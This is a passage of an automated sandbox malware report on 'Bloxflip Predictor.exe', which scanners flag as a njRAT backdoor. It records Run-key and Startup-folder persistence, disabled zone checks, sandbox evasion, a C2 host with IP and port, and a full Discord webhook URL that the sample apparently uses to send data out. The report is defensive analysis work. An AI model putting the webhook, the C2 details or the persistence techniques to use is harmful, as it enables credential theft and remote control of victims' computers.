          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeMemory allocated: FA0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeMemory allocated: 2B70000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeMemory allocated: 4B70000 memory commit | memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeMemory allocated: 1250000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeMemory allocated: 32B0000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeMemory allocated: 52B0000 memory commit | memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeMemory allocated: 3400000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeMemory allocated: 3400000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeMemory allocated: 5400000 memory commit | memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeMemory allocated: 1830000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeMemory allocated: 34A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeMemory allocated: 54A0000 memory commit | memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeWindow / User API: threadDelayed 2686Jump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeWindow / User API: threadDelayed 7299Jump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeWindow / User API: foregroundWindowGot 1774Jump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe TID: 2624Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exe TID: 6588Thread sleep count: 2686 > 30Jump to behavior
          Source: C:\Windows\Bloxflip Predictor.exe TID: 6588Thread sleep time: -2686000s >= -30000sJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exe TID: 6588Thread sleep count: 7299 > 30Jump to behavior
          Source: C:\Windows\Bloxflip Predictor.exe TID: 6588Thread sleep time: -7299000s >= -30000sJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exe TID: 1292Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe TID: 6728Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: Bloxflip Predictor.exe, 0000000A.00000002.2393717586.00000000014C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Windows.exe, 0000000C.00000002.2880044538.00000000016A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\,
          Source: Bloxflip Predictor.exe, 00000002.00000002.4504825162.00000000013A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\Bloxflip Predictor.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess created: C:\Windows\Bloxflip Predictor.exe "C:\Windows\Bloxflip Predictor.exe" Jump to behavior
          Source: Bloxflip Predictor.exe, 00000002.00000002.4505594179.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Bloxflip Predictor.exe, 00000002.00000002.4505594179.000000000377E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: Bloxflip Predictor.exe, 00000002.00000002.4505594179.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Bloxflip Predictor.exe, 00000002.00000002.4505594179.000000000377E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@9
          Source: C:\Windows\Bloxflip Predictor.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeQueries volume information: C:\ VolumeInformationJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Windows\Bloxflip Predictor.exeRegistry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKSJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: Bloxflip Predictor.exe, type: SAMPLE
          Source: Yara matchFile source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Bloxflip Predictor.exe PID: 5504, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPED
          Source: Yara matchFile source: C:\Windows\Bloxflip Predictor.exe, type: DROPPED

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: Bloxflip Predictor.exe, type: SAMPLE
          Source: Yara matchFile source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Bloxflip Predictor.exe PID: 5504, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPED
          Source: Yara matchFile source: C:\Windows\Bloxflip Predictor.exe, type: DROPPED
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Command and Scripting Interpreter
          321
          Registry Run Keys / Startup Folder
          1
          Access Token Manipulation
          121
          Masquerading
          OS Credential Dumping11
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          11
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading
          12
          Process Injection
          11
          Disable or Modify Tools
          LSASS Memory1
          Process Discovery
          Remote Desktop ProtocolData from Removable Media1
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)321
          Registry Run Keys / Startup Folder
          31
          Virtualization/Sandbox Evasion
          Security Account Manager31
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive2
          Ingress Tool Transfer
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          DLL Side-Loading
          1
          Access Token Manipulation
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput Capture3
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
          Process Injection
          LSA Secrets2
          File and Directory Discovery
          SSHKeylogging4
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Software Packing
          Cached Domain Credentials11
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574576 Sample: Bloxflip Predictor.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 44 quite-cs.at.ply.gg 2->44 46 discord.com 2->46 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 12 other signatures 2->54 9 Bloxflip Predictor.exe 2 7 2->9         started        13 Bloxflip Predictor.exe 3 2->13         started        15 Windows.exe 4 2->15         started        signatures3 process4 file5 36 C:\Windows\Bloxflip Predictor.exe, PE32 9->36 dropped 38 C:\Users\user\...\Bloxflip Predictor.exe.log, ASCII 9->38 dropped 62 Uses cmd line tools excessively to alter registry or file data 9->62 64 Drops executables to the windows directory (C:\Windows) and starts them 9->64 66 Creates an autostart registry key pointing to binary in C:\Windows 9->66 17 Bloxflip Predictor.exe 19 6 9->17         started        22 attrib.exe 1 9->22         started        signatures6 process7 dnsIp8 40 quite-cs.at.ply.gg 147.185.221.224, 10397, 49726, 49777 SALSGIVERUS United States 17->40 42 discord.com 162.159.137.232, 443, 49714 CLOUDFLARENETUS United States 17->42 34 C:\Users\user\AppData\Roaming\...\Windows.exe, PE32 17->34 dropped 56 Uses cmd line tools excessively to alter registry or file data 17->56 58 Disables zone checking for all users 17->58 60 Creates multiple autostart registry keys 17->60 24 attrib.exe 1 17->24         started        26 attrib.exe 1 17->26         started        28 conhost.exe 22->28         started        file9 signatures10 process11 process12 30 conhost.exe 24->30         started        32 conhost.exe 26->32         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Bloxflip Predictor.exe84%ReversingLabsByteCode-MSIL.Backdoor.njRAT
          Bloxflip Predictor.exe100%AviraTR/Dropper.Gen7
          Bloxflip Predictor.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe100%AviraTR/Dropper.Gen7
          C:\Windows\Bloxflip Predictor.exe100%AviraTR/Dropper.Gen7
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe100%Joe Sandbox ML
          C:\Windows\Bloxflip Predictor.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe84%ReversingLabsByteCode-MSIL.Backdoor.njRAT
          C:\Windows\Bloxflip Predictor.exe84%ReversingLabsByteCode-MSIL.Backdoor.njRAT
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://gg.ylp.ta.sc-etiuq0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          discord.com
          162.159.137.232
          truefalse
            high
            quite-cs.at.ply.gg
            147.185.221.224
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              https://discord.com/api/webhooks/1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZYDHIuWHv2Qzzn-JTgsdIpfalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                https://discord.com/api/webhooks/1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZBloxflip Predictor.exe, Windows.exe.2.dr, Bloxflip Predictor.exe.1.drfalse
                  high
                  https://gg.ylp.ta.sc-etiuqBloxflip Predictor.exe, Windows.exe.2.dr, Bloxflip Predictor.exe.1.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  162.159.137.232
                  discord.comUnited States
                  13335CLOUDFLARENETUSfalse
                  147.185.221.224
                  quite-cs.at.ply.ggUnited States
                  12087SALSGIVERUStrue
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1574576
                  Start date and time:2024-12-13 12:30:38 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 45s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:13
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Bloxflip Predictor.exe
                  Detection:MAL
                  Classification:mal100.phis.troj.adwa.evad.winEXE@14/6@2/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 216
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • VT rate limit hit for: Bloxflip Predictor.exe
                  TimeTypeDescription
                  06:32:21API Interceptor445047x Sleep call for process: Bloxflip Predictor.exe modified
                  12:31:33AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk
                  12:31:46AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows2 C:\Windows\Bloxflip Predictor.exe
                  12:31:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.URL
                  12:32:03AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows2 C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.URL
                  12:32:11AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.URL
                  12:32:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows2 C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.URL
                  12:32:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.URL
                  12:32:35AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  162.159.137.232phost.exeGet hashmaliciousBlank GrabberBrowse
                    WE8zqotCFj.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                      EsgeCzT4do.exeGet hashmaliciousXWormBrowse
                        program.exeGet hashmaliciousBlank GrabberBrowse
                          NEVER OPEN!.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                            YDW0S5K7hi.exeGet hashmaliciousSilverRatBrowse
                              Xyq6rvzLJs.exeGet hashmaliciousSilverRatBrowse
                                CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                                  file.exeGet hashmaliciousUnknownBrowse
                                    SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                      147.185.221.224freevbucks.exeGet hashmaliciousNjratBrowse
                                        BlazingPackLauncher.exeGet hashmaliciousNjratBrowse
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          discord.comchos.exeGet hashmaliciousUnknownBrowse
                                          • 162.159.138.232
                                          phost.exeGet hashmaliciousBlank GrabberBrowse
                                          • 162.159.137.232
                                          ihost.exeGet hashmaliciousPython Stealer, Muck StealerBrowse
                                          • 162.159.136.232
                                          shost.exeGet hashmaliciousPython Stealer, Muck StealerBrowse
                                          • 162.159.136.232
                                          sppawx.exeGet hashmaliciousBlank GrabberBrowse
                                          • 162.159.135.232
                                          ahost.exeGet hashmaliciousBlank GrabberBrowse
                                          • 162.159.135.232
                                          wsapx.exeGet hashmaliciousBlank GrabberBrowse
                                          • 162.159.136.232
                                          WE8zqotCFj.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                          • 162.159.137.232
                                          ozAxx9uGHu.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                          • 162.159.136.232
                                          eCXXUk54sx.exeGet hashmaliciousDivulge StealerBrowse
                                          • 162.159.128.233
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, LummaC Stealer, XmrigBrowse
                                          • 172.67.139.78
                                          file.exeGet hashmaliciousUnknownBrowse
                                          • 172.67.192.146
                                          https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                          • 104.17.25.14
                                          https://aggttt.z4.web.core.windows.net/?bcda=00-1-234-294-2156Get hashmaliciousTechSupportScamBrowse
                                          • 1.1.1.1
                                          https://idw.soundestlink.com/ce/c/675b7a96903a5335b119c33f/675b7ae33d33226215120f66/675b7afd057112d43b49094d?signature=7e9e7eead1b3f32bbe3709a667795cd47f753f0f46ed5e056831680ea81aa102Get hashmaliciousUnknownBrowse
                                          • 172.64.145.78
                                          https://opof.utackhepr.com/WE76L1u/Get hashmaliciousUnknownBrowse
                                          • 104.18.95.41
                                          taskhost.exeGet hashmaliciousXWormBrowse
                                          • 104.26.2.16
                                          https://e.trustifi.com/#/fff2a6/34074b/38c75f/bf3fbd/0d1c47/12c665/f3cdcd/c1be48/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d08b7b/9066d9/86c9f0/b1ff53/224fc1/c5dff5/a64e02/f00a15/3cdbea/a78615/4ddb76/30d9f7/98e1a2/9412cb/8e2651/8d4e63/9d313b/2f0213/ae3252/642e4a/6f0b2e/306b49/fd8e03/84bfef/0da4e6/6224c1/902b5e/e0d84c/badeba/3e52c1/94282a/975221/7a2e92/514659/ae5bab/957b7b/eb9e61/6942c6/d917d9/44a5ae/e58297/02048a/55f177/dca75c/c46e68/ac781c/5b787b/abcd53/568132/1d514a/5290de/d0b524/7d0cb6/e4e8bf/2ff215/1ddb69/add914/7674bb/dc5d9b/8fc829/561052/f5a816/40ee64/a0bcf5/b0cc13/8e70a5/255ef2/b24b8d/81e09f/4c70dd/5bbaa4/7ff26c/f1999b/4a2515/4a3a04/0a188eGet hashmaliciousUnknownBrowse
                                          • 104.17.25.14
                                          smb.ps1Get hashmaliciousXmrigBrowse
                                          • 104.16.231.132
                                          file.exeGet hashmaliciousLummaCBrowse
                                          • 172.67.164.37
                                          SALSGIVERUSsystem404.exeGet hashmaliciousMetasploitBrowse
                                          • 147.185.221.19
                                          Discord.exeGet hashmaliciousAsyncRATBrowse
                                          • 147.185.221.18
                                          CVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                          • 147.185.221.22
                                          file.exeGet hashmaliciousXWormBrowse
                                          • 147.185.221.24
                                          NhoqAfkhHL.batGet hashmaliciousUnknownBrowse
                                          • 147.185.221.24
                                          sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                          • 147.160.103.28
                                          a4lIk1Jrla.exeGet hashmaliciousNjrat, RevengeRATBrowse
                                          • 147.185.221.24
                                          W6s1vzcRdj.exeGet hashmaliciousXWormBrowse
                                          • 147.185.221.24
                                          u7e3vb5dfk.exeGet hashmaliciousXWormBrowse
                                          • 147.185.221.24
                                          aOi4JyF92S.exeGet hashmaliciousXWormBrowse
                                          • 147.185.221.24
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          54328bd36c14bd82ddaa0c04b25ed9adCVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                          • 162.159.137.232
                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                          • 162.159.137.232
                                          TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 162.159.137.232
                                          Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                          • 162.159.137.232
                                          hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 162.159.137.232
                                          hesaphareketi-01.pdfsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 162.159.137.232
                                          41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                          • 162.159.137.232
                                          malware.ps1Get hashmaliciousMassLogger RATBrowse
                                          • 162.159.137.232
                                          Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                          • 162.159.137.232
                                          QUOTES REQUEST FOR PRICES.exeGet hashmaliciousMassLogger RATBrowse
                                          • 162.159.137.232
                                          No context
                                          Process:C:\Users\user\Desktop\Bloxflip Predictor.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):525
                                          Entropy (8bit):5.259753436570609
                                          Encrypted:false
                                          SSDEEP:12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
                                          MD5:260E01CC001F9C4643CA7A62F395D747
                                          SHA1:492AD0ACE3A9C8736909866EEA168962D418BE5A
                                          SHA-256:4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
                                          SHA-512:01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
                                          Malicious:true
                                          Reputation:moderate, very likely benign file
